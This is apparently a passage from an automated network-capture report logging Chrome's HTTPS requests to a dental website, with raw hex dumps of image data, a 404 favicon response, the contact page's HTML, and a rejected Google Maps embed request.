                                                                                                                                      2024-04-24 10:13:33 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 c7 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 5e 66 84 92 76 cf 17 a6 17 31 fe c7 05 f7 16 ef 3b 64 99 87 8f c9 af ea d5 59 f7 ed a1 f9 cc 1b 5e 0e 04 7b 42 77 6f 9c af c9 3b 63 f3 ec 9b 37 98 2c 71 92 ce fa 0a 71 02 4f f4 6a 15 63 73 de ad 4d 0d dd c4 74 f9 32 0c 3f fb 81 7e 8a 69 b1 93 f6 57 0c ea 0f 1f 1a 4f db a0 9c 77 83 25 1f 48 07 0f 5d 54 bb fa c9 f2 3b 7a 65 f9 e9 9e 61 dc 8e 0f 7c 13 f4 49 0b 4f b1 33 bb 5b c8 7f c4 ed 16 72 9e 25 a0 b3 b4 51 7d ce e7 ca 7b 3d cd 7c 7d be de 4e b8 9b fe 88 0b 93 71 f8 75 e5 b9 6b ff 00 a7 b6 33 ce 17 bd 9e c7 26 76 5e 53 e0 7e 6e b5 f2 13 37 96 a6 fd be d1 2c 64 e6 6d e6 c3 d0 e2 93 6c fc 9b 21 a7 89 7d 68 4f 12 c0 f0 3b 68 be 97 71 f8 59 b2 ba be 0b ee 61 ea 90 3f f5 da b9 93 fe 14 8c ed f7 37 f5 4b 10 23 f4 1c 13 1b 39 66 2e 77 7a 3c 74 7b 4e c8 70 b1 f3
                                                                                                                                      Data Ascii: ^fv1;dY^{Bwo;c7,qqOjcsMt2?~iWOw%H]T;zea|IO3[r%Q}{=|}Nquk3&v^S~n7,dml!}hO;hqYa?7K#9f.wz<t{Np
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 27 4c 72 24 0e b2 ac 8a d6 f6 e7 f6 30 49 20 e6 1a 69 e9 75 02 b2 5e 82 d7 4e 79 aa 9d 3a dd 17 97 77 39 05 5e d6 c4 3e 9b aa 7d 0d 5a e2 f2 c8 07 ed ee 7b 18 00 f5 9a a6 31 c6 c8 8e 19 98 9c 95 66 42 78 81 da bd 64 7b 16 d7 1b 7b cc 74 ae e6 f2 4a ae e3 66 b5 95 ba 63 26 30 32 00 02 3e 05 33 b7 aa ea f2 6e 98 03 4a 93 d4 12 0f 73 8d 03 0f 59 5d d9 36 39 18 6b 1c 8c 3d 60 83 f0 ac f2 6d 97 ad fd d8 77 d4 20 fc 49 91 ce f0 e8 3b c7 b0 28 90 d1 c2 ab 4c 96 f3 c7 fb 48 9e de b6 9f 81 67 71 19 57 15 33 45 2f 2e 39 2c 72 c2 1e 49 70 aa dc e5 53 82 0e 3d c6 db 6e fa 97 46 2b ce 8b 03 f6 f7 c5 5f 02 59 23 3f 45 c7 d8 6a bd 03 c2 cb 2b 41 41 c3 74 9b a4 38 36 60 f0 38 3d b8 fa 42 a9 db ad ec 7f b5 8b 57 4b 0f c6 ba 92 b0 70 58 27 8c 50 8a 20 c7 2e fe c6 b1 ce 90
                                                                                                                                      Data Ascii: 'Lr$0I iu^Ny:w9^>}Z{1fBxd{{tJfc&02>3nJsY]69k=`mw I;(LHgqW3E/.9,rIpS=nF+_Y#?Ej+AAt86`8=BWKpX'P .
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 49 71 f4 2f 29 e5 f6 b9 9e 62 bd 2f 6b 99 e2 0a b4 16 d0 0a fc 90 ee 22 94 af 4a f5 bb f3 9a 2c 20 8c 82 4c 93 0c 07 1d 21 ef a6 1d 4b cb 79 4a 76 4f 79 7d 2b 9a 01 0e 2c 61 26 ae a6 7d ee 4b d3 e1 ff 00 ed 3c 97 d6 be 77 9b fe b6 d9 e9 1b 7c dd 21 8b 66 9d ed 22 be 20 cc 57 26 1a e1 51 c3 a5 79 7b 66 80 cb 57 c0 c2 d6 3e dd a5 ad 26 a4 07 1c 9c 71 af 4a ef f9 ed ce 3b 0c ad 8e ae 7b dd 2e 90 1a 5e 4d 18 05 34 b4 12 7b 02 c1 6a d2 db 4b 67 39 a4 11 6f 1d 45 29 f2 41 a2 f9 fe 5e 1b 6b dd f4 f7 f5 4f 67 07 cc ef 74 5b 05 c7 0a b2 5a d7 3a 69 2a 7f 84 6d d3 e3 3f ea 8a aa fc dc d9 e7 d8 a7 f0 a2 7b de e8 df 46 31 ae 73 b1 a3 45 1a d1 55 a3 f0 ce 29 ed a0 93 c7 8a 48 5c e7 00 04 8c 73 0e 5f 48 05 ca f0 db f1 75 fe ad ff 00 0f b9 f5 0d c5 fa 8b 07 20 b9 8f 5a
                                                                                                                                      Data Ascii: Iq/)b/k"J, L!KyJvOy}+,a&}K<w|!f" W&Qy{fW>&qJ;{.^M4{jKg9oE)A^kOgt[Z:i*m?{F1sEU)H\s_Hu Z
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: cd 99 e0 b5 ad 73 83 6a 30 a9 08 99 d2 99 0e a3 af 91 38 9a 2b 98 9a be e1 6f b8 58 c9 4f 0e ea 12 7a 25 67 c2 57 4e 19 43 87 75 ed 3d 4e 07 d8 57 e7 80 ed 54 1a 41 71 cb 25 a5 b2 5c db 91 dd 2c 39 e6 46 1d 14 29 a1 97 e8 b6 b8 80 2b 80 56 b5 dc 42 f8 06 db e6 7d d3 6f 99 b3 db 48 ea b4 d4 31 cf 2f 69 e8 2d 7e a0 42 fa 05 87 e2 ce cb 24 0c 66 f1 e5 e7 3a e6 9a 64 92 d1 ed 0c 77 d2 6b 1f 42 de aa a0 ea fe 24 df 98 3c ad 63 62 c6 ea 37 97 26 e1 c3 33 e1 c2 0b ce 1d 18 2f 15 b1 df cd f7 a1 b7 dc b8 4a d7 35 b2 5b 5c 37 e5 35 c2 a1 8e af 56 0b 67 9c fc c9 6f e6 49 ec 6e ec 63 7d a5 95 9d b9 64 2c 99 cd 0e f1 1c ea ba ad 6d 46 9d 2d 01 71 7c bf 1b a4 d5 74 d3 83 a6 86 de d0 71 68 63 fc 57 1e cc 7b 14 dd 78 7a 46 a3 ea bb 1e 0f 6a f7 36 6e ee 85 e1 36 62 43 9b
                                                                                                                                      Data Ascii: sj08+oXOz%gWNCu=NWTAq%\,9F)+VB}oH1/i-~B$f:dwkB$<cb7&3/J5[\75VgoInc}d,mF-q|tqhcW{xzFj6n6bC
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: db c8 f3 fb a7 bf c3 7f e6 cb a4 a9 81 dc 49 18 d0 38 62 d3 91 18 82 8a a0 75 4a a8 42 01 08 aa 10 15 42 48 40 20 9a 04 24 72 40 04 ea 47 14 90 a0 98 9a 46 e4 e2 a6 2e 9f f2 80 3d 61 52 91 41 ab c7 89 de f3 4b 7a 41 55 cd 3d bc 4d 2f 2f c0 70 21 50 56 1d c4 fd 89 52 c8 ab 9d bd da b7 2a 95 4b b7 f8 87 bb 19 3d 65 79 d7 1c 52 a9 59 1d e3 e6 27 83 dc 8c 76 ac ef df ee 5c 4d 03 42 e3 92 52 c7 9a 0e 93 b7 bb c3 93 e9 d4 15 2e dd af 5d 9c a5 61 29 51 06 97 5f 5d 3b 39 5d 8f 4a a5 d7 12 bb 37 9f 4a af 24 95 0c c8 e3 c5 40 b8 9e 28 29 28 0a a5 54 21 14 b1 c9 24 21 02 48 84 f0 42 2e 11 ea 55 c8 3b f0 fd 73 fa 8e 56 aa a4 f7 e1 fa e7 f5 1c a6 57 0f 78 84 93 5d 1c 80 4d 20 9a 06 84 93 45 09 a4 9a 01 09 26 80 42 48 40 d0 12 4d 40 21 09 2a 1a 45 09 15 02 2a 24 a9 15
                                                                                                                                      Data Ascii: I8buJBBH@ $r@GF.=aRAKzAU=M//p!PVR*K=eyRY'v\MBR.]a)Q_];9]J7J$@()(T!$!HB.U;sVWx]M E&BH@M@!*E*$
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: f4 1e 73 ea 2b 3f f4 a2 4e 6d 71 41 ec 6c ef 2c 77 48 cb ec e4 12 50 7d a4 44 51 ec fa ec 38 ac db 86 cb 6b 7d 1e 99 99 a8 8f 75 d9 39 bf 55 dc 17 91 2c 7c 72 36 68 5c e8 66 66 2d 95 87 4b 81 e8 2b d0 6d fe 68 2d a4 1b cb 3a 05 e4 63 0f f7 ac 19 75 b5 17 2f 3d b8 f9 7a f2 c8 b9 f0 83 3c 23 1c 07 7c 0e 96 f1 eb 0b 90 0f 25 f5 9d 10 dc 44 d9 62 73 65 89 de ec 8c 20 8e c2 17 0b 74 f2 d5 b5 e1 32 30 78 53 1f de b0 62 7e bb 72 29 85 78 44 9d ee 38 f4 15 b6 fb 6b bc db 9c 7e f0 ca c5 93 67 6e 2c 3d 7c bb 56 17 fb 8e ea 50 49 9e eb 7a 82 90 24 10 78 8c 94 5b ee 8e a0 a4 a0 e9 88 62 dd 9a 5d 61 1b 62 dc 40 ac bb 7b 7b ad 94 01 8c 96 95 f9 5f 3a 3f cd 5c f6 48 5a ea c6 e2 c7 b4 d0 fc 97 02 33 07 e2 55 9c 68 41 21 cd 21 cd 70 c0 82 32 20 f3 5d a8 f7 4d bf 76 60 b7
                                                                                                                                      Data Ascii: s+?NmqAl,wHP}DQ8k}u9U,|r6h\ff-K+mh-:cu/=z<#|%Dbse t20xSb~r)xD8k~gn,=|VPIz$x[b]ab@{{_:?\HZ3UhA!!p2 ]Mv`
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 45 c1 27 13 45 9a a2 bc 54 4a 75 51 25 01 55 12 99 2a 25 00 54 49 e2 99 2a 25 02 3e b5 02 a5 55 02 54 11 71 e0 aa 71 cd 4d c7 35 5b cd 10 53 21 54 38 ab 9e 78 2a 1c 78 f0 41 03 4c d5 72 10 02 99 3c f0 54 cb 95 10 66 90 e0 56 59 16 87 9c d6 59 0a 0a 1e 7f b1 52 f3 85 0a b1 e7 9f 15 4b 8e 28 2b 71 5d 78 d9 a7 cb 33 3e 9e f4 ed f5 55 71 9c 57 a4 74 24 79 59 8d f9 cf d5 ea 27 e0 44 7d 71 09 21 6c 34 24 84 02 10 95 54 0d 22 8a a5 54 0d 24 21 02 42 10 80 42 10 80 4d 24 20 10 13 a2 14 50 a0 54 8a 89 41 02 a0 68 a6 54 0a 08 39 50 f5 7b 95 4e 08 33 b9 20 9b d4 2a 82 75 c1 46 41 56 14 ea 91 c4 15 28 f0 72 9f b8 f9 be d6 53 83 65 76 83 d4 ec 17 b8 c9 78 9f 37 30 db dd da de 37 03 1c 80 d7 a8 af 68 c7 89 18 c9 06 4f 68 70 3d 62 ab 3c d7 91 a4 53 48 aa 11 51 29 a8 92
                                                                                                                                      Data Ascii: E'ETJuQ%U*%TI*%>UTqqM5[S!T8x*xALr<TfVYYRK(+q]x3>UqWt$yY'D}q!l4$T"T$!BBM$ PTAhT9P{N3 *uFAV(rSevx707hOhp=b<SHQ)
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 4d d6 f5 b7 59 02 6e ae 18 d7 7c c6 9d 4e 3d 8d 5c 4b cf 3b 35 82 96 36 c5 d5 f7 5f 31 a5 7a 9a 31 4c 53 2f 65 5a f4 ae 75 f6 f9 b5 6d f5 fb d5 db 1a e1 fb b6 9d 6f fc d6 d5 7c fa eb 7a dd f7 12 7e f3 72 e6 c6 7f 75 17 71 be ac d6 46 c3 6d f2 9a 41 3c 4a b3 6f aa 65 e9 af fc fe d1 56 6d d6 a5 c7 84 93 9a 0e c6 35 79 9b ef 30 ef 1b 89 22 e2 e9 c1 87 f7 51 f7 1b e8 6a cf 75 03 63 c4 1a 83 92 ca 02 d6 30 99 14 e2 85 20 d2 54 83 55 10 a2 74 56 69 4c 35 04 03 53 0d 56 08 cf 25 31 18 eb aa 0a 83 4a 90 8c ab c3 38 05 30 cf 4a 0a 5b 18 5e e3 c8 d3 78 51 5c 37 e6 b8 3b b1 78 e0 d5 ea 3c 9a ea 5c 5c c5 f3 99 92 97 81 1e f6 eb cd 9b 5d 93 40 9e 40 24 03 dd cc 95 e6 77 0f c4 09 a6 71 8b 6d 84 92 70 0f 77 c4 b9 7b a6 da cb 8b cf 15 f5 2d 03 dd 1f 09 59 8c fb 7d 90 d3
                                                                                                                                      Data Ascii: MYn|N=\K;56_1z1LS/eZumo|z~ruqFmA<JoeVm5y0"Qjuc0 TUtViL5SV%1J80J[^xQ\7;x<\\]@@$wqmpw{-Y}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      75192.168.2.164980591.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:33 UTC755OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _ga_DF396SG33H=GS1.1.1713953610.1.0.1713953610.0.0.0; _ga=GA1.3.375164163.1713953611; _gid=GA1.3.666271976.1713953612; _gat_gtag_UA_119979881_1=1
                                                                                                                                      2024-04-24 10:13:34 UTC416INHTTP/1.1 404 Not Found
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 1251
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:33 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:34 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                                                      2024-04-24 10:13:34 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                                                                      Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      76192.168.2.164980791.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:47 UTC876OUTGET /contact HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _ga_DF396SG33H=GS1.1.1713953610.1.0.1713953610.0.0.0; _ga=GA1.3.375164163.1713953611; _gid=GA1.3.666271976.1713953612; _gat_gtag_UA_119979881_1=1
                                                                                                                                      2024-04-24 10:13:48 UTC447INHTTP/1.1 301 Moved Permanently
                                                                                                                                      Connection: close
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      x-redirect-by: WordPress
                                                                                                                                      location: https://dentalhealthstop.co.uk/contact/
                                                                                                                                      x-litespeed-cache: hit
                                                                                                                                      content-length: 0
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:48 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      77192.168.2.164980891.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:48 UTC877OUTGET /contact/ HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _ga_DF396SG33H=GS1.1.1713953610.1.0.1713953610.0.0.0; _ga=GA1.3.375164163.1713953611; _gid=GA1.3.666271976.1713953612; _gat_gtag_UA_119979881_1=1
                                                                                                                                      2024-04-24 10:13:48 UTC527INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://dentalhealthstop.co.uk/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      link: <https://dentalhealthstop.co.uk/?p=9>; rel=shortlink
                                                                                                                                      etag: "2284-1713923520;;;"
                                                                                                                                      x-litespeed-cache: hit
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:48 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:48 UTC841INData Raw: 33 32 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6e 74 61 63 74 20 55 73 20 26 6e 64 61 73 68 3b 20 44 65 6e 74 61 6c 20 48 65 61 6c 74 68 20 53 74 6f 70 3c 2f 74 69 74 6c 65 3e 0a
                                                                                                                                      Data Ascii: 3253<!DOCTYPE html><html lang="en"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Contact Us &ndash; Dental Health Stop</title>
                                                                                                                                      2024-04-24 10:13:48 UTC12050INData Raw: 09 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 77 69 6e 64 6f 77 2e 63 6f 6f 6b 69 65 63 6f 6e 73 65 6e 74 2e 69 6e 69 74 69 61 6c 69 73 65 28 7b 0a 09 20 20 22 70 61 6c 65 74 74 65 22 3a 20 7b 0a 09 09 22 70 6f 70 75 70 22 3a 20 7b 0a 09 09 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 20 22 23 30 30 30 30 30 30 22 0a 09 09 7d 2c 0a 09 09 22 62 75 74 74 6f 6e 22 3a 20 7b 0a 09 09 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 20 22 23 37 65 36 63 66 66 22 2c 0a 09 09 20 20 22 74 65 78 74 22 3a 20 22 23 66 66 66 66 66 66 22 0a 09 09 7d 0a 09 20 20 7d 2c 0a 09 20 20 22 74 68 65 6d 65 22 3a 20 22 63 6c 61 73 73 69 63 22 2c 0a 09 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 7b
                                                                                                                                      Data Ascii: window.addEventListener("load", function(){window.cookieconsent.initialise({ "palette": {"popup": { "background": "#000000"},"button": { "background": "#7e6cff", "text": "#ffffff"} }, "theme": "classic", "content": {
                                                                                                                                      2024-04-24 10:13:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      78192.168.2.1649816142.250.101.1034437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:49 UTC862OUTGET /maps/embed/v1/place?key=AIzaSyCeLSdqTKK24QTZ2fgw9w5olAcpwi4Hbw0&q=52.620904,+-2.129217 HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:49 UTC512INHTTP/1.1 403 Forbidden
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Robots-Tag: noindex,nofollow
                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Vary: X-Origin
                                                                                                                                      Vary: Referer
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:49 GMT
                                                                                                                                      Server: scaffolding on HTTPServer2
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Accept-Ranges: none
                                                                                                                                      Vary: Origin,Accept-Encoding
                                                                                                                                      Connection: close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      2024-04-24 10:13:49 UTC83INData Raw: 34 64 0d 0a 47 6f 6f 67 6c 65 20 4d 61 70 73 20 50 6c 61 74 66 6f 72 6d 20 72 65 6a 65 63 74 65 64 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 54 68 65 20 70 72 6f 76 69 64 65 64 20 41 50 49 20 6b 65 79 20 69 73 20 69 6e 76 61 6c 69 64 2e 20 0d 0a
                                                                                                                                      Data Ascii: 4dGoogle Maps Platform rejected your request. The provided API key is invalid.
                                                                                                                                      2024-04-24 10:13:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      79192.168.2.164981491.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
